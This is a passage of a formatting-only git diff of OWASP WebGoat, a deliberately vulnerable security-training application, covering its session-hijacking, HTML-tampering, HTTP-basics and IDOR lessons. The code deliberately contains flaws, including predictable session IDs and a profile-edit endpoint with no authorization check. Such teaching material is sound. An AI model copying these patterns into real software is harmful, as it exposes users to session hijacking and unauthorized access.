-        ByteArrayOutputStream baos = new ByteArrayOutputStream();
-        DataOutputStream dos = new DataOutputStream(baos);
-        dos.writeLong(-8699352886133051976L);
-        dos.close();
-        byte[] longBytes = baos.toByteArray();
-        return bytesToHex(longBytes);
-    }
-
-    public static String bytesToHex(byte[] bytes) {
-        char[] hexChars = new char[bytes.length * 2];
-        for (int j = 0; j < bytes.length; j++) {
-            int v = bytes[j] & 0xFF;
-            hexChars[j * 2] = hexArray[v >>> 4];
-            hexChars[j * 2 + 1] = hexArray[v & 0x0F];
-        }
-        return new String(hexChars);
-    }
-
+    return new String(hexChars);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
index c233a1d23..c43ece76b 100644
--- a/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSession.java
@@ -36,13 +36,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class HijackSession extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A1;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A1;
+  }
 
-    @Override
-    public String getTitle() {
-        return "hijacksession.title";
-    }
+  @Override
+  public String getTitle() {
+    return "hijacksession.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignment.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignment.java
index bc18ca680..00416b964 100644
--- a/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignment.java
@@ -24,7 +24,6 @@ package org.owasp.webgoat.lessons.hijacksession;
 
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletResponse;
-
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -46,47 +45,47 @@ import org.springframework.web.bind.annotation.RestController;
 
 @RestController
 @AssignmentHints({
-    "hijacksession.hints.1",
-    "hijacksession.hints.2",
-    "hijacksession.hints.3",
-    "hijacksession.hints.4",
-    "hijacksession.hints.5"
+  "hijacksession.hints.1",
+  "hijacksession.hints.2",
+  "hijacksession.hints.3",
+  "hijacksession.hints.4",
+  "hijacksession.hints.5"
 })
 public class HijackSessionAssignment extends AssignmentEndpoint {
 
-    private static final String COOKIE_NAME = "hijack_cookie";
+  private static final String COOKIE_NAME = "hijack_cookie";
 
-    @Autowired
-    HijackSessionAuthenticationProvider provider;
+  @Autowired HijackSessionAuthenticationProvider provider;
 
-    @PostMapping(path = "/HijackSession/login")
-    @ResponseBody
-    public AttackResult login(
-        @RequestParam String username,
-        @RequestParam String password,
-        @CookieValue(value = COOKIE_NAME, required = false) String cookieValue,
-        HttpServletResponse response) {
+  @PostMapping(path = "/HijackSession/login")
+  @ResponseBody
+  public AttackResult login(
+      @RequestParam String username,
+      @RequestParam String password,
+      @CookieValue(value = COOKIE_NAME, required = false) String cookieValue,
+      HttpServletResponse response) {
 
-        Authentication authentication;
-        if (StringUtils.isEmpty(cookieValue)) {
-            authentication = provider.authenticate(Authentication.builder().name(username).credentials(password).build());
-            setCookie(response, authentication.getId());
-        } else {
-            authentication = provider.authenticate(Authentication.builder().id(cookieValue).build());
-        }
-
-        if (authentication.isAuthenticated()) {
-            return success(this).build();
-        }
-
-        return failed(this).build();
+    Authentication authentication;
+    if (StringUtils.isEmpty(cookieValue)) {
+      authentication =
+          provider.authenticate(
+              Authentication.builder().name(username).credentials(password).build());
+      setCookie(response, authentication.getId());
+    } else {
+      authentication = provider.authenticate(Authentication.builder().id(cookieValue).build());
     }
 
-    private void setCookie(HttpServletResponse response, String cookieValue) {
-        Cookie cookie = new Cookie(COOKIE_NAME, cookieValue);
-        cookie.setPath("/WebGoat");
-        cookie.setSecure(true);
-        response.addCookie(cookie);
+    if (authentication.isAuthenticated()) {
+      return success(this).build();
     }
 
+    return failed(this).build();
+  }
+
+  private void setCookie(HttpServletResponse response, String cookieValue) {
+    Cookie cookie = new Cookie(COOKIE_NAME, cookieValue);
+    cookie.setPath("/WebGoat");
+    cookie.setSecure(true);
+    response.addCookie(cookie);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/Authentication.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/Authentication.java
index 72bfae5ec..7931028a3 100644
--- a/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/Authentication.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/Authentication.java
@@ -24,44 +24,39 @@
 package org.owasp.webgoat.lessons.hijacksession.cas;
 
 import java.security.Principal;
-
 import lombok.Builder;
 import lombok.Getter;
 import lombok.ToString;
 
 /**
- *
  * @author Angel Olle Blazquez
- *
  */
-
 @Getter
 @ToString
 public class Authentication implements Principal {
 
-    private boolean authenticated = false;
-    private String name;
-    private Object credentials;
-    private String id;
+  private boolean authenticated = false;
+  private String name;
+  private Object credentials;
+  private String id;
 
-    @Builder
-    public Authentication(String name, Object credentials, String id) {
-        this.name = name;
-        this.credentials = credentials;
-        this.id = id;
-    }
+  @Builder
+  public Authentication(String name, Object credentials, String id) {
+    this.name = name;
+    this.credentials = credentials;
+    this.id = id;
+  }
 
-    @Override
-    public String getName() {
-        return name;
-    }
+  @Override
+  public String getName() {
+    return name;
+  }
 
-    protected void setAuthenticated(boolean authenticated) {
-        this.authenticated = authenticated;
-    }
-
-    protected void setId(String id) {
-        this.id = id;
-    }
+  protected void setAuthenticated(boolean authenticated) {
+    this.authenticated = authenticated;
+  }
 
+  protected void setId(String id) {
+    this.id = id;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/AuthenticationProvider.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/AuthenticationProvider.java
index 9d5447296..55af2c53c 100644
--- a/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/AuthenticationProvider.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/AuthenticationProvider.java
@@ -26,14 +26,10 @@ package org.owasp.webgoat.lessons.hijacksession.cas;
 import java.security.Principal;
 
 /**
- *
  * @author Angel Olle Blazquez
- *
  */
-
 @FunctionalInterface
 public interface AuthenticationProvider<T extends Principal> {
 
-    T authenticate(T t);
-
+  T authenticate(T t);
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProvider.java b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProvider.java
index b59720bfc..018dd8bf1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProvider.java
+++ b/src/main/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProvider.java
@@ -30,15 +30,12 @@ import java.util.Random;
 import java.util.concurrent.ThreadLocalRandom;
 import java.util.function.DoublePredicate;
 import java.util.function.Supplier;
-
 import org.apache.commons.lang3.StringUtils;
 import org.springframework.stereotype.Component;
 import org.springframework.web.context.annotation.ApplicationScope;
 
 /**
- *
  * @author Angel Olle Blazquez
- *
  */
 
 // weak id value and mechanism
@@ -47,54 +44,53 @@ import org.springframework.web.context.annotation.ApplicationScope;
 @Component
 public class HijackSessionAuthenticationProvider implements AuthenticationProvider<Authentication> {
 
-    private Queue<String> sessions = new LinkedList<>();
-    private static long id = new Random().nextLong() & Long.MAX_VALUE;
-    protected static final int MAX_SESSIONS = 50;
+  private Queue<String> sessions = new LinkedList<>();
+  private static long id = new Random().nextLong() & Long.MAX_VALUE;
+  protected static final int MAX_SESSIONS = 50;
 
-    private static final DoublePredicate PROBABILITY_DOUBLE_PREDICATE = pr -> pr < 0.75;
-    private static final Supplier<String> GENERATE_SESSION_ID = () -> ++id + "-" + Instant.now().toEpochMilli();
-    public static final Supplier<Authentication> AUTHENTICATION_SUPPLIER = () -> Authentication
-        .builder()
-        .id(GENERATE_SESSION_ID.get())
-        .build();
+  private static final DoublePredicate PROBABILITY_DOUBLE_PREDICATE = pr -> pr < 0.75;
+  private static final Supplier<String> GENERATE_SESSION_ID =
+      () -> ++id + "-" + Instant.now().toEpochMilli();
+  public static final Supplier<Authentication> AUTHENTICATION_SUPPLIER =
+      () -> Authentication.builder().id(GENERATE_SESSION_ID.get()).build();
 
-    @Override
-    public Authentication authenticate(Authentication authentication) {
-        if (authentication == null) {
-            return AUTHENTICATION_SUPPLIER.get();
-        }
-
-        if (StringUtils.isNotEmpty(authentication.getId()) && sessions.contains(authentication.getId())) {
-            authentication.setAuthenticated(true);
-            return authentication;
-        }
-
-        if (StringUtils.isEmpty(authentication.getId())) {
-            authentication.setId(GENERATE_SESSION_ID.get());
-        }
-
-        authorizedUserAutoLogin();
-
-        return authentication;
+  @Override
+  public Authentication authenticate(Authentication authentication) {
+    if (authentication == null) {
+      return AUTHENTICATION_SUPPLIER.get();
     }
 
-    protected void authorizedUserAutoLogin() {
-        if (!PROBABILITY_DOUBLE_PREDICATE.test(ThreadLocalRandom.current().nextDouble())) {
-            Authentication authentication = AUTHENTICATION_SUPPLIER.get();
-            authentication.setAuthenticated(true);
-            addSession(authentication.getId());
-        }
+    if (StringUtils.isNotEmpty(authentication.getId())
+        && sessions.contains(authentication.getId())) {
+      authentication.setAuthenticated(true);
+      return authentication;
     }
 
-    protected boolean addSession(String sessionId) {
-        if (sessions.size() >= MAX_SESSIONS) {
-            sessions.remove();
-        }
-        return sessions.add(sessionId);
+    if (StringUtils.isEmpty(authentication.getId())) {
+      authentication.setId(GENERATE_SESSION_ID.get());
     }
 
-    protected int getSessionsSize() {
-        return sessions.size();
-    }
+    authorizedUserAutoLogin();
 
+    return authentication;
+  }
+
+  protected void authorizedUserAutoLogin() {
+    if (!PROBABILITY_DOUBLE_PREDICATE.test(ThreadLocalRandom.current().nextDouble())) {
+      Authentication authentication = AUTHENTICATION_SUPPLIER.get();
+      authentication.setAuthenticated(true);
+      addSession(authentication.getId());
+    }
+  }
+
+  protected boolean addSession(String sessionId) {
+    if (sessions.size() >= MAX_SESSIONS) {
+      sessions.remove();
+    }
+    return sessions.add(sessionId);
+  }
+
+  protected int getSessionsSize() {
+    return sessions.size();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTampering.java b/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTampering.java
index 6c63c6cc1..0302c0b4f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTampering.java
+++ b/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTampering.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -35,13 +36,13 @@ import org.springframework.stereotype.Component;
  */
 @Component
 public class HtmlTampering extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.CLIENT_SIDE;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.CLIENT_SIDE;
+  }
 
-    @Override
-    public String getTitle() {
-        return "html-tampering.title";
-    }
+  @Override
+  public String getTitle() {
+    return "html-tampering.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTamperingTask.java b/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTamperingTask.java
index c34d3c69b..8a0ba7103 100644
--- a/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTamperingTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/htmltampering/HtmlTamperingTask.java
@@ -34,12 +34,12 @@ import org.springframework.web.bind.annotation.RestController;
 @AssignmentHints({"hint1", "hint2", "hint3"})
 public class HtmlTamperingTask extends AssignmentEndpoint {
 
-    @PostMapping("/HtmlTampering/task")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String QTY, @RequestParam String Total) {
-        if (Float.parseFloat(QTY) * 2999.99 > Float.parseFloat(Total) + 1) {
-            return success(this).feedback("html-tampering.tamper.success").build();
-        }
-        return failed(this).feedback("html-tampering.tamper.failure").build();
+  @PostMapping("/HtmlTampering/task")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String QTY, @RequestParam String Total) {
+    if (Float.parseFloat(QTY) * 2999.99 > Float.parseFloat(Total) + 1) {
+      return success(this).feedback("html-tampering.tamper.success").build();
     }
+    return failed(this).feedback("html-tampering.tamper.failure").build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasics.java b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasics.java
index eaecf1839..d70aaebb4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasics.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasics.java
@@ -28,13 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class HttpBasics extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.GENERAL;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.GENERAL;
+  }
 
-    @Override
-    public String getTitle() {
-        return "1.http-basics.title";//first lesson in general
-    }
+  @Override
+  public String getTitle() {
+    return "1.http-basics.title"; // first lesson in general
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsLesson.java b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsLesson.java
index af7e80416..883f14f31 100644
--- a/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsLesson.java
@@ -34,16 +34,16 @@ import org.springframework.web.bind.annotation.RestController;
 @AssignmentHints({"http-basics.hints.http_basics_lesson.1"})
 public class HttpBasicsLesson extends AssignmentEndpoint {
 
-    @PostMapping("/HttpBasics/attack1")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String person) {
-        if (!person.isBlank()) {
-            return success(this)
-                .feedback("http-basics.reversed")
-                .feedbackArgs(new StringBuilder(person).reverse().toString())
-                .build();
-        } else {
-            return failed(this).feedback("http-basics.empty").build();
-        }
+  @PostMapping("/HttpBasics/attack1")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String person) {
+    if (!person.isBlank()) {
+      return success(this)
+          .feedback("http-basics.reversed")
+          .feedbackArgs(new StringBuilder(person).reverse().toString())
+          .build();
+    } else {
+      return failed(this).feedback("http-basics.empty").build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsQuiz.java b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsQuiz.java
index ae9bcebce..c6c14ad73 100644
--- a/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpbasics/HttpBasicsQuiz.java
@@ -36,19 +36,22 @@ import org.springframework.web.bind.annotation.RestController;
 @AssignmentPath("HttpBasics/attack2")
 public class HttpBasicsQuiz extends AssignmentEndpoint {
 
-    @PostMapping("/HttpBasics/attack2")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String answer, @RequestParam String magic_answer, @RequestParam String magic_num) {
-        if ("POST".equalsIgnoreCase(answer) && magic_answer.equals(magic_num)) {
-            return success(this).build();
-        } else {
-            if (!"POST".equalsIgnoreCase(answer)) {
-                return failed(this).feedback("http-basics.incorrect").build();
-            }
-            if (!magic_answer.equals(magic_num)) {
-                return failed(this).feedback("http-basics.magic").build();
-            }
-        }
-        return failed(this).build();
+  @PostMapping("/HttpBasics/attack2")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String answer,
+      @RequestParam String magic_answer,
+      @RequestParam String magic_num) {
+    if ("POST".equalsIgnoreCase(answer) && magic_answer.equals(magic_num)) {
+      return success(this).build();
+    } else {
+      if (!"POST".equalsIgnoreCase(answer)) {
+        return failed(this).feedback("http-basics.incorrect").build();
+      }
+      if (!magic_answer.equals(magic_num)) {
+        return failed(this).feedback("http-basics.magic").build();
+      }
     }
+    return failed(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequest.java b/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequest.java
index 0550018a7..b3ad85e95 100644
--- a/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequest.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequest.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.httpproxies;
 
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.HttpMethod;
@@ -32,22 +33,27 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-
 @RestController
 public class HttpBasicsInterceptRequest extends AssignmentEndpoint {
 
-    @RequestMapping(path = "/HttpProxies/intercept-request", method = {RequestMethod.POST, RequestMethod.GET})
-    @ResponseBody
-    public AttackResult completed(@RequestHeader(value = "x-request-intercepted", required = false) Boolean headerValue,
-                                  @RequestParam(value = "changeMe", required = false) String paramValue, HttpServletRequest request) {
-        if (HttpMethod.POST.matches(request.getMethod())) {
-            return failed(this).feedback("http-proxies.intercept.failure").build();
-        }
-        if (headerValue != null && paramValue != null && headerValue && "Requests are tampered easily".equalsIgnoreCase(paramValue)) {
-            return success(this).feedback("http-proxies.intercept.success").build();
-        } else {
-            return failed(this).feedback("http-proxies.intercept.failure").build();
-        }
+  @RequestMapping(
+      path = "/HttpProxies/intercept-request",
+      method = {RequestMethod.POST, RequestMethod.GET})
+  @ResponseBody
+  public AttackResult completed(
+      @RequestHeader(value = "x-request-intercepted", required = false) Boolean headerValue,
+      @RequestParam(value = "changeMe", required = false) String paramValue,
+      HttpServletRequest request) {
+    if (HttpMethod.POST.matches(request.getMethod())) {
+      return failed(this).feedback("http-proxies.intercept.failure").build();
     }
+    if (headerValue != null
+        && paramValue != null
+        && headerValue
+        && "Requests are tampered easily".equalsIgnoreCase(paramValue)) {
+      return success(this).feedback("http-proxies.intercept.success").build();
+    } else {
+      return failed(this).feedback("http-proxies.intercept.failure").build();
+    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpProxies.java b/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpProxies.java
index a111e1223..1d9326426 100644
--- a/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpProxies.java
+++ b/src/main/java/org/owasp/webgoat/lessons/httpproxies/HttpProxies.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -35,13 +36,13 @@ import org.springframework.stereotype.Component;
  */
 @Component
 public class HttpProxies extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.GENERAL;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.GENERAL;
+  }
 
-    @Override
-    public String getTitle() {
-        return "2.http-proxies.title";//second lesson in GENERAL
-    }
+  @Override
+  public String getTitle() {
+    return "2.http-proxies.title"; // second lesson in GENERAL
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
index 38dc2a9eb..0adeeb25f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author misfir3
@@ -36,13 +37,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class IDOR extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A1;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A1;
+  }
 
-    @Override
-    public String getTitle() {
-        return "idor.title";
-    }
+  @Override
+  public String getTitle() {
+    return "idor.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/IDORDiffAttributes.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORDiffAttributes.java
index 0b0dcca3d..f145ca1f9 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/IDORDiffAttributes.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORDiffAttributes.java
@@ -31,22 +31,28 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
-@AssignmentHints({"idor.hints.idorDiffAttributes1", "idor.hints.idorDiffAttributes2", "idor.hints.idorDiffAttributes3"})
+@AssignmentHints({
+  "idor.hints.idorDiffAttributes1",
+  "idor.hints.idorDiffAttributes2",
+  "idor.hints.idorDiffAttributes3"
+})
 public class IDORDiffAttributes extends AssignmentEndpoint {
 
-    @PostMapping("/IDOR/diff-attributes")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String attributes) {
-        attributes = attributes.trim();
-        String[] diffAttribs = attributes.split(",");
-        if (diffAttribs.length < 2) {
-            return failed(this).feedback("idor.diff.attributes.missing").build();
-        }
-        if (diffAttribs[0].toLowerCase().trim().equals("userid") && diffAttribs[1].toLowerCase().trim().equals("role")
-                || diffAttribs[1].toLowerCase().trim().equals("userid") && diffAttribs[0].toLowerCase().trim().equals("role")) {
-            return success(this).feedback("idor.diff.success").build();
-        } else {
-            return failed(this).feedback("idor.diff.failure").build();
-        }
+  @PostMapping("/IDOR/diff-attributes")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String attributes) {
+    attributes = attributes.trim();
+    String[] diffAttribs = attributes.split(",");
+    if (diffAttribs.length < 2) {
+      return failed(this).feedback("idor.diff.attributes.missing").build();
     }
+    if (diffAttribs[0].toLowerCase().trim().equals("userid")
+            && diffAttribs[1].toLowerCase().trim().equals("role")
+        || diffAttribs[1].toLowerCase().trim().equals("userid")
+            && diffAttribs[0].toLowerCase().trim().equals("role")) {
+      return success(this).feedback("idor.diff.success").build();
+    } else {
+      return failed(this).feedback("idor.diff.failure").build();
+    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/idor/IDOREditOtherProfiile.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDOREditOtherProfiile.java
index d142c5ec9..404d0aeb4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/idor/IDOREditOtherProfiile.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDOREditOtherProfiile.java
@@ -34,66 +34,80 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
-@AssignmentHints({"idor.hints.otherProfile1", "idor.hints.otherProfile2", "idor.hints.otherProfile3", "idor.hints.otherProfile4", "idor.hints.otherProfile5", "idor.hints.otherProfile6", "idor.hints.otherProfile7", "idor.hints.otherProfile8", "idor.hints.otherProfile9"})
+@AssignmentHints({
+  "idor.hints.otherProfile1",
+  "idor.hints.otherProfile2",
+  "idor.hints.otherProfile3",
+  "idor.hints.otherProfile4",
+  "idor.hints.otherProfile5",
+  "idor.hints.otherProfile6",
+  "idor.hints.otherProfile7",
+  "idor.hints.otherProfile8",
+  "idor.hints.otherProfile9"
+})
 public class IDOREditOtherProfiile extends AssignmentEndpoint {
 
-    @Autowired
-    private UserSessionData userSessionData;
+  @Autowired private UserSessionData userSessionData;
 
-    @PutMapping(path = "/IDOR/profile/{userId}", consumes = "application/json")
-    @ResponseBody
-    public AttackResult completed(@PathVariable("userId") String userId, @RequestBody UserProfile userSubmittedProfile) {
+  @PutMapping(path = "/IDOR/profile/{userId}", consumes = "application/json")
+  @ResponseBody
+  public AttackResult completed(
+      @PathVariable("userId") String userId, @RequestBody UserProfile userSubmittedProfile) {
 
-        String authUserId = (String) userSessionData.getValue("idor-authenticated-user-id");
-        // this is where it starts ... accepting the user submitted ID and assuming it will be the same as the logged in userId and not checking for proper authorization
-        // Certain roles can sometimes edit others' profiles, but we shouldn't just assume that and let everyone, right?
-        // Except that this is a vulnerable app ... so we will
-        UserProfile currentUserProfile = new UserProfile(userId);
-        if (userSubmittedProfile.getUserId() != null && !userSubmittedProfile.getUserId().equals(authUserId)) {
-            // let's get this started ...
-            currentUserProfile.setColor(userSubmittedProfile.getColor());
-            currentUserProfile.setRole(userSubmittedProfile.getRole());
-            // we will persist in the session object for now in case we want to refer back or use it later
-            userSessionData.setValue("idor-updated-other-profile", currentUserProfile);
-            if (currentUserProfile.getRole() <= 1 && currentUserProfile.getColor().toLowerCase().equals("red")) {
-                return success(this)
-                        .feedback("idor.edit.profile.success1")
-                        .output(currentUserProfile.profileToMap().toString())
-                        .build();
-            }
+    String authUserId = (String) userSessionData.getValue("idor-authenticated-user-id");
+    // this is where it starts ... accepting the user submitted ID and assuming it will be the same
+    // as the logged in userId and not checking for proper authorization
+    // Certain roles can sometimes edit others' profiles, but we shouldn't just assume that and let
+    // everyone, right?
+    // Except that this is a vulnerable app ... so we will
+    UserProfile currentUserProfile = new UserProfile(userId);
+    if (userSubmittedProfile.getUserId() != null
+        && !userSubmittedProfile.getUserId().equals(authUserId)) {
+      // let's get this started ...
+      currentUserProfile.setColor(userSubmittedProfile.getColor());
